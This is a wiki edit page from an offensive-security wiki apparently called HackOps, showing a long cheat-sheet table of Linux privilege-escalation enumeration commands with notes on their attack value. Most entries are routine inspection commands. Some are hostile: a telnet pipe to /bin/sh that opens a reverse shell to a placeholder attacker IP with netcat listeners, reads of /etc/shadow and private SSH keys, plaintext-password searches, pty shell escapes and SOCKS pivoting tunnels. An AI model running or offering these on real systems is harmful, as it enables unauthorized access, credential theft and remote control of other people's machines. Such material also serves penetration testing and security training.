Editing
Privilege Escalation
(section)
Jump to navigation
Jump to search
Warning:
You are not logged in. Your IP address will be publicly visible if you make any edits. If you
log in
or
create an account
, your edits will be attributed to your username, along with other benefits.
Anti-spam check. Do
not
fill this in!
=== Linux Enumeration Commands === {| class="wikitable sortable" ! Purpose !! Command !! Potential Use in Privilege Escalation |- | SUID/SGID binaries || <code>find / -perm -4000 2>/dev/null</code> || May reveal misconfigured binaries that can be exploited for privilege escalation. |- | Kernel version || <code>uname -a</code> || Identifying vulnerable kernel versions that have known local privilege escalation exploits. |- | Environment variables || <code>env</code> || May expose sensitive paths or misconfigured variables usable in custom script execution. |- | Running processes || <code>ps aux</code> || Reveals running services or scripts running as root; useful for process injection or misconfigurations. |- | Installed packages (Debian) || <code>dpkg -l</code> || Can identify vulnerable software versions or unintended package installs. |- | Installed packages (Red Hat) || <code>rpm -qa</code> || Same as above, but for RPM-based systems. |- | Writable directories || <code>find / -writable 2>/dev/null</code> || Writable locations may allow backdoor placement, script replacement, or abuse in cron jobs. |- | Cron jobs || <code>cat /etc/crontab</code> || Look for jobs running as root or referencing writable scripts. |- | User info || <code>cat /etc/passwd</code> || Useful for identifying users, shell access, and potential privilege chaining. |- | Group info || <code>cat /etc/group</code> || Can show membership in sensitive groups like `sudo`, `docker`, or `adm`. |- | OS version info (Generic) || <code>cat /etc/issue</code> || Helps fingerprint system for targeted exploits. |- | OS version info (All common release files) || <code>cat /etc/*-release</code> || Same purpose β confirms distro and version for exploit matching. |- | OS version (Debian based) || <code>cat /etc/lsb-release</code> || Specifically useful for identifying Ubuntu/Debian versions. |- | OS version (Red Hat based) || <code>cat /etc/redhat-release</code> || Same, but for RHEL/CentOS systems. |- | Kernel version & architecture || <code>cat /proc/version # Shows detailed kernel version and build info</code><br> <code>uname -a # Displays all system info including kernel name and architecture</code><br> <code>uname -mrs # Prints kernel name, version, and hardware name</code><br> <code>rpm -q kernel # Lists installed kernel packages (RPM-based systems)</code><br> <code>dmesg | grep Linux # Extracts kernel-related boot messages</code><br> <code>ls /boot | grep vmlinuz- # Lists available kernel images in /boot</code> || Used to identify kernel-specific vulnerabilities and tailor exploits to system architecture. |- | Environment configuration files || <code>cat /etc/profile # System-wide environment variables</code><br> <code>cat /etc/bashrc # System-wide bash shell settings</code><br> <code>cat ~/.bash_profile # User-specific environment variables</code><br> <code>cat ~/.bashrc # User-specific bash shell settings</code><br> <code>cat ~/.bash_logout # Commands run at logout</code><br> <code>env # Print current environment variables</code> || Can reveal exposed credentials, custom paths, or insecure settings that can be leveraged for privilege escalation. |- | Printer services || <code>lpstat -a # Lists printers and their status</code> || May indicate running printer daemons or services with elevated privileges that can be misused or are misconfigured. |- | Running services & privileges || <code>ps aux # Lists all running processes with associated users</code> <code>ps -ef # Alternative view of all processes with full format</code><br> <code>top # Dynamic real-time process list</code><br> <code>cat /etc/services # Maps known services to their ports</code> || Helps identify active services and their privilege levels, which may include insecure or unnecessary daemons. |- | Root-owned services || <code>ps aux | grep root # Filters running processes owned by root</code> <code>ps -ef | grep root # Alternate full-format view of root-owned processes</code> || Useful for spotting services running as root that may be vulnerable or misconfigured β valuable targets for privilege escalation. |- | Installed applications & versions || <code>ls -alh /usr/bin/ # Lists applications and binaries in user path</code> <code>ls -alh /sbin/ # Lists system binaries</code><br> <code>dpkg -l # Lists installed packages (Debian-based systems)</code> <code>rpm -qa # Lists installed packages (RPM-based systems)</code> <code>ls -alh /var/cache/apt/archives # Shows downloaded .deb packages</code> <code>ls -alh /var/cache/yum/ # Shows cached .rpm packages</code> || Reveals software presence and versions β helpful for identifying vulnerable or exploitable programs that may be running. |- |- | Service config files || <code>cat /etc/syslog.conf # Syslog daemon configuration</code> <code>cat /etc/chttp.conf # Tiny HTTP server config</code> <code>cat /etc/lighttpd.conf # Lighttpd server config</code> <code>cat /etc/cups/cupsd.conf # Printing service config</code> <code>cat /etc/inetd.conf # Legacy super-server config</code> <code>cat /etc/apache2/apache2.conf # Apache main config (Debian-based)</code> <code>cat /etc/my.conf # MySQL config file</code> <code>cat /etc/httpd/conf/httpd.conf # Apache main config (RHEL-based)</code> <code>cat /opt/lampp/etc/httpd.conf # XAMPP's Apache config</code> <code>ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' # Lists readable files under /etc/ (potential misconfigurations)</code> || Checking these can reveal misconfigured services, overly permissive settings, or vulnerable modules that open attack vectors. |- | Scheduled jobs || <code>crontab -l # List current user's cron jobs</code> <code>ls -alh /var/spool/cron # View cron job files for users</code> <code>ls -al /etc/ | grep cron # Search for cron-related files</code> <code>ls -al /etc/cron* # List contents of cron directories</code> <code>cat /etc/cron* # Print content of all cron config files</code> <code>cat /etc/at.allow # Users allowed to use 'at'</code> <code>cat /etc/at.deny # Users denied from using 'at'</code> <code>cat /etc/cron.allow # Users allowed to use cron</code> <code>cat /etc/cron.deny # Users denied from using cron</code> <code>cat /etc/crontab # System-wide cron job definitions</code> <code>cat /etc/anacrontab # anacron job scheduler config</code> <code>cat /var/spool/cron/crontabs/root # Root's scheduled cron jobs</code> || Scheduled jobs may reveal tasks running as root, outdated scripts, or writable paths exploitable for privilege escalation. |- | Plaintext credentials || <code>grep -i user [filename] # Search for 'user' (case-insensitive)</code> <code>grep -i pass [filename] # Search for 'pass' (case-insensitive)</code> <code>grep -C 5 "password" [filename] # Show context around 'password'</code> <code>find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Look for hardcoded credentials in PHP files (e.g., Joomla)</code> || These patterns help uncover stored plaintext usernames or passwords in misconfigured or insecure code and config files. |- | Network interfaces || <code>/sbin/ifconfig -a # Show all network interfaces and their status</code> <code>cat /etc/network/interfaces # Network config (Debian-based)</code> <code>cat /etc/sysconfig/network # Network config (RHEL-based)</code> || Identifies available network interfaces and reveals if the system is connected to other networks β useful for lateral movement or pivoting. |- | Network configuration || <code>cat /etc/resolv.conf # Shows DNS servers</code> <code>cat /etc/sysconfig/network # Hostname, default gateway (RHEL-based)</code> <code>cat /etc/networks # Legacy network name mappings</code> <code>iptables -L # Lists firewall rules</code> <code>hostname # Shows system hostname</code> <code>dnsdomainname # Shows domain part of system's FQDN</code> || Helps reveal DNS, gateway, and firewall configuration β can indicate internal network structure and potential egress routes. |- | Active connections & services || <code>lsof -i # Lists open network connections</code> <code>lsof -i :80 # Check if web service is active</code> <code>grep 80 /etc/services # Maps port 80 to service name</code> <code>netstat -antup # Shows all TCP/UDP connections with PID</code> <code>netstat -antpx # Same with extended process info</code> <code>netstat -tulpn # All listening services with PID</code> <code>chkconfig --list # Lists services and runlevels</code> <code>chkconfig --list | grep 3:on # Services started in runlevel 3</code> <code>last # Login history of users</code> <code>w # Who is currently logged in</code> || Reveals running services, user activity, and possible internal communication β useful for identifying targets or attack surfaces. |- | Cached network data || <code>arp -e # ARP table (IP β MAC mappings)</code> <code>route # Kernel routing table</code> <code>/sbin/route -nee # Detailed routing info with interface names</code> || Displays cached IP and MAC addresses and routing paths β may expose other systems on the network or paths for movement. |- | Shell access & interaction || <code>nc -lvp 4444 # Attacker. Input (Commands)</code> <code>nc -lvp 4445 # Attacker. Output (Results)</code> <code>telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the target's system. Use the attacker's IP!</code> || Establishing an interactive shell can allow full control of the compromised system, enabling command execution and data exfiltration. |- | Tunneling & redirection || <code>ssh -D 127.0.0.1:9050 -N [username]@[ip] # Create SOCKS proxy for local tunneling</code> <code>proxychains ifconfig # Test command routing through proxy</code> || Useful for pivoting through the network or anonymizing outbound traffic via local or remote tunneling. |- | User identity & privilege || <code>id # Show current user ID and group</code> <code>who # List currently logged-in users</code> <code>w # Show who is logged in and what they are doing</code> <code>last # List recent user logins</code> <code>cat /etc/passwd | cut -d: -f1 # List of system users</code> <code>grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }' # Identify superuser accounts</code> <code>awk -F: '($3 == "0") {print}' /etc/passwd # Another way to list UID 0 accounts</code> <code>cat /etc/sudoers # View sudo privileges</code> <code>sudo -l # List current user's sudo rights</code> || Helps determine current privileges, available escalation paths, and visibility of other user accounts on the system. |- | Sensitive files || <code>cat /etc/passwd # User account information</code> <code>cat /etc/group # Group definitions</code> <code>cat /etc/shadow # Encrypted passwords (requires root)</code> <code>ls -alh /var/mail/ # User mailboxes, may contain sensitive data</code> || These files can expose system users, password hashes, and private data if permissions are misconfigured or access is gained through privilege escalation. |- | Home directory inspection || <code>ls -ahlR /root/ # Recursively list all files in root's home directory</code> <code>ls -ahlR /home/ # Recursively list all user home directories</code> || May reveal leftover files, misconfigured permissions, SSH keys, or credentials stored in plaintext. |- | Password storage in known files || <code>cat /var/apache2/config.inc # May contain hardcoded database credentials</code> <code>cat /var/lib/mysql/mysql/user.MYD # Raw MySQL user table data</code> <code>cat /root/anaconda-ks.cfg # Kickstart config file, often contains root password in plaintext</code> || These locations may store sensitive data such as database passwords or install-time credentials. |- | User activity & command history || <code>cat ~/.bash_history # Shell command history</code> <code>cat ~/.nano_history # Nano editor history</code> <code>cat ~/.atftp_history # atftp client history</code> <code>cat ~/.mysql_history # MySQL client history</code> <code>cat ~/.php_history # PHP interactive shell history</code> || Reviewing history files can expose credentials, database access, or other sensitive commands typed by the user. |- | Local user information || <code>cat ~/.bashrc # User shell configuration</code> <code>cat ~/.profile # User environment profile</code> <code>cat /var/mail/root # Root user's email inbox</code> <code>cat /var/spool/mail/root # Another root mail location</code> || These files may reveal environmental setups, messages with credentials, or scripts executed at login. |- | SSH key & config files || <code>cat ~/.ssh/authorized_keys # Allowed public keys for login</code> <code>cat ~/.ssh/identity.pub # Public key used for SSH auth</code> <code>cat ~/.ssh/identity # Private key (sensitive)</code> <code>cat ~/.ssh/id_rsa.pub # RSA public key</code> <code>cat ~/.ssh/id_rsa # RSA private key</code> <code>cat ~/.ssh/id_dsa.pub # DSA public key</code> <code>cat ~/.ssh/id_dsa # DSA private key</code> <code>cat /etc/ssh/ssh_config # SSH client configuration</code> <code>cat /etc/ssh/sshd_config # SSH daemon configuration</code> <code>cat /etc/ssh/ssh_host_dsa_key.pub # Host DSA public key</code> <code>cat /etc/ssh/ssh_host_dsa_key # Host DSA private key</code> <code>cat /etc/ssh/ssh_host_rsa_key.pub # Host RSA public key</code> <code>cat /etc/ssh/ssh_host_rsa_key # Host RSA private key</code> <code>cat /etc/ssh/ssh_host_key.pub # Legacy host public key</code> <code>cat /etc/ssh/ssh_host_key # Legacy host private key</code> || These files may expose private SSH keys, login credentials, or insecure configurations that enable unauthorized access. |- | Writable config files in /etc/ || <code>ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # World-writable files in /etc/</code> <code>ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner-writable files</code> <code>ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group-writable files</code> <code>ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other-writable files</code> <code>find /etc/ -readable -type f 2>/dev/null # All readable files in /etc/</code> <code>find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Readable top-level files only</code> || Writable configuration files may allow privilege escalation by altering service behavior or execution paths. |- | Contents of /var/ || <code>ls -alh /var/log # Logs from services and the system</code> <code>ls -alh /var/mail # Mailboxes for users</code> <code>ls -alh /var/spool # Scheduled tasks, print queues, and mail spools</code> <code>ls -alh /var/spool/lpd # Line printer daemon data</code> <code>ls -alh /var/lib/pgsql # PostgreSQL data directory</code> <code>ls -alh /var/lib/mysql # MySQL database directory</code> <code>cat /var/lib/dhcp3/dhclient.leases # DHCP lease information</code> || These directories may hold logs, mail, databases, or cached network info that could leak sensitive data or credentials. |- | Web directories and config files || <code>ls -alhR /var/www/ # Default web root on many systems</code> <code>ls -alhR /srv/www/htdocs/ # SUSE/openSUSE web root</code> <code>ls -alhR /usr/local/www/apache22/data/ # FreeBSD Apache web root</code> <code>ls -alhR /opt/lampp/htdocs/ # XAMPP web root</code> <code>ls -alhR /var/www/html/ # Common web root (e.g. CentOS, Ubuntu)</code> || Useful for discovering exposed config files, credentials, or sensitive content in hosted web applications. |- | Log file inspection || <code>cat /etc/httpd/logs/access_log # Apache access log</code> <code>cat /etc/httpd/logs/access.log # Apache access log alt path</code> <code>cat /etc/httpd/logs/error_log # Apache error log</code> <code>cat /etc/httpd/logs/error.log # Apache error log alt path</code> <code>cat /var/log/apache2/access_log # Apache2 access log</code> <code>cat /var/log/apache2/access.log # Apache2 access log alt path</code> <code>cat /var/log/apache2/error_log # Apache2 error log</code> <code>cat /var/log/apache2/error.log # Apache2 error log alt path</code> <code>cat /var/log/apache/access_log # Apache access log (alt)</code> <code>cat /var/log/apache/access.log # Apache access log (alt)</code> <code>cat /var/log/auth.log # Authentication events</code> <code>cat /var/log/chttp.log # cHTTP log</code> <code>cat /var/log/cups/error_log # Printer service log</code> <code>cat /var/log/dpkg.log # Package installation log (Debian)</code> <code>cat /var/log/faillog # Failed login attempts</code> <code>cat /var/log/httpd/access_log # Apache access log</code> <code>cat /var/log/httpd/access.log # Apache access log</code> <code>cat /var/log/httpd/error_log # Apache error log</code> <code>cat /var/log/httpd/error.log # Apache error log</code> <code>cat /var/log/lastlog # Last login of all users</code> <code>cat /var/log/lighttpd/access.log # Lighttpd access log</code> <code>cat /var/log/lighttpd/error.log # Lighttpd error log</code> <code>cat /var/log/lighttpd/lighttpd.access.log # Lighttpd alt access log</code> <code>cat /var/log/lighttpd/lighttpd.error.log # Lighttpd alt error log</code> <code>cat /var/log/messages # General system messages</code> <code>cat /var/log/secure # Security/authentication log</code> <code>cat /var/log/syslog # System log (Ubuntu, Debian)</code> <code>cat /var/log/wtmp # Login history (binary format)</code> <code>cat /var/log/xferlog # FTP file transfer log</code> <code>cat /var/log/yum.log # YUM package manager log</code> <code>cat /var/run/utmp # Current logins (binary format)</code> <code>cat /var/webmin/miniserv.log # Webmin log</code> <code>cat /var/www/logs/access_log # Apache access log (within web root)</code> <code>cat /var/www/logs/access.log # Apache access log (within web root)</code> <code>ls -alh /var/lib/dhcp3/ # DHCP lease and config files</code> <code>ls -alh /var/log/postgresql/ # PostgreSQL logs</code> <code>ls -alh /var/log/proftpd/ # FTP server logs</code> <code>ls -alh /var/log/samba/ # SMB service logs</code> || Reviewing log files may reveal usernames, passwords, visited URLs, session tokens, or useful paths for local file inclusion (LFI) or privilege escalation. |- | Shell escape techniques || <code>python -c 'import pty;pty.spawn("/bin/bash")' # Spawn interactive bash shell via Python</code> <code>echo os.system('/bin/bash') # Execute bash from within echo/os.system()</code> <code>/bin/sh -i # Interactive shell via /bin/sh</code> || Useful for escaping restricted shells or limited environments to gain a fully interactive session. |- | Mounted file-systems || <code>mount # Show all currently mounted file systems</code> <code>df -h # Show disk usage in human-readable format</code> || Reveals mounted volumes, file systems, and potential writable targets for persistence or data access. |- | Unmounted file-systems || <code>cat /etc/fstab # Configuration file for disk mounting at boot</code> || Shows devices intended for mounting β may reveal hidden partitions, backup volumes, or encrypted containers. |- | Advanced file permissions || <code>find / -perm -1000 -type d 2>/dev/null # Sticky bit directories (e.g., /tmp)</code> <code>find / -perm -g=s -type f 2>/dev/null # Files with SGID set</code> <code>find / -perm -u=s -type f 2>/dev/null # Files with SUID set</code> <code>find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID files</code> <code>for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Search *bin dirs for SGID/SUID</code> <code>find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null # Deep search for SUID/SGID, exclude symlinks</code> || SUID/SGID/sticky permissions are a common source of privilege escalation vectors, especially on older systems or misconfigured apps. |- | Writable & executable directories || <code>find / -writable -type d 2>/dev/null # World-writable directories</code> <code>find / -perm -222 -type d 2>/dev/null # Directories with write permission for anyone</code> <code>find / -perm -o w -type d 2>/dev/null # Same: world-writeable directories</code> <code>find / -perm -o x -type d 2>/dev/null # World-executable directories</code> <code>find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # Directories writable & executable by anyone</code> || Identifies folders where an attacker can drop binaries or scripts for execution β commonly abused for persistence and privilege escalation. |- | Problematic files & ownership || <code>find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # World-writable dirs without sticky bit</code> <code>find /dir -xdev \( -nouser -o -nogroup \) -print # Files with no valid user/group owner</code> || These can indicate misconfigured permissions, abandoned files, or opportunities to tamper with files belonging to no defined user. |- | Available dev tools & languages || <code>find / -name perl* # Locate Perl installations</code> <code>find / -name python* # Locate Python interpreters</code> <code>find / -name gcc* # Locate GNU Compiler Collection binaries</code> <code>find / -name cc # Locate C compiler</code> || Identifying available programming environments allows exploit code to be compiled or interpreted locally β essential for privilege escalation via code execution. |- | File upload capabilities || <code>find / -name wget # Check for file download via wget</code> <code>find / -name nc* # Netcat binaries</code> <code>find / -name netcat* # Alternative name for Netcat</code> <code>find / -name tftp* # TFTP client</code> <code>find / -name ftp # Basic FTP client</code> || Discovering which tools are present for file transfer helps determine how exploits, scripts, or reverse shells can be delivered to the system. |- | System patch level || <code>apt-get update && apt-get upgrade # Update package lists and upgrade all packages (Debian-based)</code> <code>yum update # Update all packages (RHEL-based)</code> || Helps determine if the system has known vulnerabilities due to missing patches. Unpatched systems are often exploitable through public CVEs. |}
Summary:
Please note that all contributions to HackOps may be edited, altered, or removed by other contributors. If you do not want your writing to be edited mercilessly, then do not submit it here.
You are also promising us that you wrote this yourself, or copied it from a public domain or similar free resource (see
HackOps:Copyrights
for details).
Do not submit copyrighted work without permission!
Cancel
Editing help
(opens in new window)
Navigation menu
Personal tools
Not logged in
Talk
Contributions
Create account
Log in
Namespaces
Page
Discussion
English
Views
Read
Edit
Edit source
View history
More
Search
Navigation
Tools
What links here
Related changes
Special pages
Page information